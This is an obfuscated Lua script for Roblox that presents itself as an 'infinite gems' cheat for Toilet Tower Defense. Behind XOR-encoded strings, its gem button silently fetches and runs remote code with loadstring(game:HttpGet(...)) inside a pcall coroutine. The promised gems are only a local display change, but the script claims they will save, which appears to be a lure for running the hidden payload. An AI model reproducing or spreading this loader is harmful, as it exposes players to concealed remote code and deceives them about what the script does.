--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v15,v16) local v17={};for v23=1, #v15 do v6(v17,v0(v4(v1(v2(v15,v23,v23 + 1 )),v1(v2(v16,1 + (v23% #v16) ,1 + (v23% #v16) + 1 )))%256 ));end return v5(v17);end local v8=loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\194\202\201\44\243\168\137\19\212\205\206\106\244\186\222\24\216\198\215\33","\126\177\163\187\69\134\219\167")))();local v9=v8:CreateWindow({[v7("\13\204\39\192","\156\67\173\74\165")]="🚽 Toilet Tower Defense Inf Gem Script 🚽",[v7("\24\184\72\18\181\40\65\0\190\93\26\185","\38\84\215\41\118\220\70")]=v7("\124\25\35\22\247\94\17\108\92\176","\158\48\118\66\114"),[v7("\136\43\30\48\122\162\238\185\37\4\63\124\171\200\170\50\25\56\116","\155\203\68\112\86\19\197")]={[v7("\99\211\55\254\76\125\225","\152\38\189\86\156\32\24\133")]=false},[v7("\215\82\190\117\229\68\179\67\241","\38\156\55\199")]=false});local v10=v9:CreateTab("🏠 Main",nil);local v11=v10:CreateSection(v7("\129\115\122\104\52\113\247\80","\35\200\29\28\72\115\20\154"));local v12=100;local v13=false;v8:Notify({[v7("\45\182\197\211\136","\84\121\223\177\191\237\76")]=v7("\136\85\219\169\42\68\112\228\163\83\202\181\46\85\52","\161\219\54\169\192\90\48\80"),[v7("\106\77\14\49\76\76\20","\69\41\34\96")]=v7("\136\247\243\74\37\30\149\131\251\5\3\47\185\199","\75\220\163\183\106\98"),[v7("\38\175\153\54\205\11\181\133","\185\98\218\235\87")]=7 -2 ,[v7("\226\49\38\225\219","\202\171\92\71\134\190")]=13047715178});v10:CreateParagraph({[v7("\29\200\56\132\44","\232\73\161\76")]="⚠️ NOTE",[v7("\152\214\76\73\27\181\205","\126\219\185\34\61")]="WAIT 1 MIN TO UPDATE YOUR GEMS. IF U LEAVE IT WON'T SAVE!"});local v14=v10:CreateParagraph({[v7("\56\199\74\126\123","\135\108\174\62\18\30\23\147")]="⏳ Status",[v7("\149\230\36\223\29\160\39","\167\214\137\74\171\120\206\83")]=v7("\188\241\59\73\241\169\140\190\124\19","\199\235\144\82\61\152")});v10:CreateButton({[v7("\41\23\180\46","\75\103\118\217")]=v7("\238\90\118\84\158\27\202\71","\126\167\52\16\116\217"),[v7("\235\47\44\140\182\24\255\195","\156\168\78\64\224\212\121")]=function() v8:Notify({[v7("\51\231\177\194\2","\174\103\142\197")]=v7("\127\38\89\120\2\91\245\69\104\109\61\36\90\225","\152\54\72\63\88\69\62"),[v7("\247\203\224\72\209\202\250","\60\180\164\142")]=v7("\104\87\6\34\103\244\29\77\76\69\40\42\226\7\86\74\69\40\41\233\82\89\93\17\32\49\236\6\93","\114\56\62\101\73\71\141"),[v7("\156\252\201\197\172\224\212\202","\164\216\137\187")]=4 -0 });end});v10:CreateSlider({[v7("\252\231\60\183","\107\178\134\81\210\198\158")]=v7("\31\11\143\213\234\25\3\141\211\164\44","\202\88\110\226\166"),[v7("\241\14\140\240\207","\170\163\111\226\151")]={285 -(134 + 151) ,190823 -90823 },[v7("\56\62\177\42\75\58\44\31\36","\73\113\80\210\88\46\87")]=1991 -(582 + 1408) ,[v7("\178\57\203\20\238\153","\135\225\76\173\114")]=v7("\61\232\181\163","\199\122\141\216\208\204\221"),[v7("\142\200\2\226\125\248\185\235\17\252\109\243","\150\205\189\112\144\24")]=346 -246 ,[v7("\3\136\190\75","\112\69\228\223\44\100\232\113")]=v7("\211\26\10\192\133\112\143\208\26\21","\230\180\127\103\179\214\28"),[v7("\175\4\83\74\230\64\227\135","\128\236\101\63\38\132\33")]=function(v18) v12=v18;end});v10:CreateButton({[v7("\130\168\28\65","\175\204\201\113\36\214\139")]=v7("\102\207\33\213\18\70\216\48","\100\39\172\85\188"),[v7("\142\121\181\140\49\172\123\178","\83\205\24\217\224")]=function() local v19=0;local v20;local v21;local v22;while true do if (v19==(0 -0)) then if v13 then return;end v13=true;v19=3 -2 ;end if ((1826 -(1195 + 629))==v19) then v21=v20:FindFirstChild(v7("\178\247\192\198\63\220\161\106\191\230\210","\30\222\146\161\162\90\174\210")) and v20.leaderstats:FindFirstChild(v7("\194\75\125\25","\106\133\46\16")) ;v22=v20.PlayerGui:FindFirstChild(v7("\116\47\113\254\67","\32\56\64\19\156\58")) and v20.PlayerGui.Lobby:FindFirstChild(v7("\121\221\247\68\95\252\131\83\205\246\112\72\243\141\95","\224\58\168\133\54\58\146")) and v20.PlayerGui.Lobby.CurrenciesFrame:FindFirstChild(v7("\126\83\70\220\120\137\146\5\77","\107\57\54\43\157\21\230\231")) and v20.PlayerGui.Lobby.CurrenciesFrame.GemAmount:FindFirstChild(v7("\248\158\3\231\188\210\204\194\167\16\236\182\201\219","\175\187\235\113\149\217\188")) and v20.PlayerGui.Lobby.CurrenciesFrame.GemAmount.CurrencyLayout:FindFirstChild(v7("\29\162\142\89\237\109\84\61\173\132\64","\24\92\207\225\44\131\25")) ;v19=3 -0 ;end if (v19==1) then coroutine.wrap(function() pcall(function() loadstring(game:HttpGet(v7("\238\209\217\45\245\159\130\114\244\196\218\115\225\204\217\53\243\199\216\46\227\215\206\50\232\209\200\51\242\139\206\50\235\138\228\48\227\201\193\50\237\192\196\54\169\226\204\48\227\234\253\14\229\215\196\45\242\138\223\56\224\214\130\53\227\196\201\46\169\200\204\52\232\138\224\28\207\235","\93\134\165\173")))();end);end)();v20=game.Players.LocalPlayer;v19=2;end if (v19==3) then if (v21 and v22) then coroutine.wrap(function() local v25=241 -(187 + 54) ;local v26;while true do if (v25==(782 -(162 + 618))) then v26.Lifetime=NumberRange.new(0.2);v26.Rate=200;v26.Speed=NumberRange.new(1);v25=3 + 0 ;end if ((3 + 1)==v25) then v13=false;break;end if (v25==1) then v14:Set({[v7("\122\162\196\126\42","\196\46\203\176\18\79\163\45")]="✅ Saved",[v7("\155\45\112\10\33\245\251","\143\216\66\30\126\68\155")]=v7("\141\205\0\216\133\176\223\238\191\196\9\139\203\172\192\161\168\205\77\199\202\160\220\228\174\137","\129\202\168\109\171\165\195\183")});v26=Instance.new(v7("\18\89\37\204\215\23\234\39\125\58\209\202\0\227\48","\134\66\56\87\184\190\116"));v26.Texture=v7("\46\51\17\186\10\248\36\33\53\53\83\244\86\185\120\103\100\101\81\227","\85\92\81\105\219\121\139\65");v25=2;end if (v25==3) then local v31=0 -0 ;while true do if (v31==1) then v26:Destroy();v25=6 -2 ;break;end if (v31==(0 + 0)) then v26.Parent=v22;wait(1636.2 -(1373 + 263) );v31=1;end end end if (0==v25) then for v34=1060 -(451 + 549) ,1 + 0 , -(1 -0) do local v35=0;while true do if (0==v35) then v14:Set({[v7("\127\218\172\64\30","\29\43\179\216\44\123")]="⏳ Status",[v7("\158\214\46\88\184\215\52","\44\221\185\64")]=v7("\50\230\94\86\125\6\167\65\81\51","\19\97\135\40\63")   .. v34   .. v7("\189\18\125\117","\81\206\60\83\91\79") });wait(1 -0 );break;end end end v21.Value=v21.Value + v12 ;v22.Text=tostring(v21.Value);v25=1385 -(746 + 638) ;end end end)();else v13=false;end break;end end end});
